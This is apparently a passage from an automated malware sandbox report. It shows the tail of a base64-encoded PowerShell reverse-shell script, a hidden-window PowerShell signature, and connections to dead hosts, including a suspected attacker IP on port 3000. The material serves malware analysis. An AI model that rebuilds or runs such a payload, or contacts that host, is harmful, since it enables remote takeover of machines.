GgAKAApAA0ACgB9ADsADQAKAA0ACgAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

Creates a suspicious Powershell process (2 events)

option	-windowstyle hidden				value	Attempts to execute command with a hidden window
option	-windowstyle hidden				value	Attempts to execute command with a hidden window

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (9 events)

dead_host	34.123.161.169:80
dead_host	192.168.56.102:49167
dead_host	192.168.56.102:49164
dead_host	192.168.56.102:49166
dead_host	192.168.56.102:49170
dead_host	192.168.56.102:49171
dead_host	192.168.56.102:49168
dead_host	192.168.56.102:49169
dead_host	34.64.143.34:3000

34.64.143.34.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All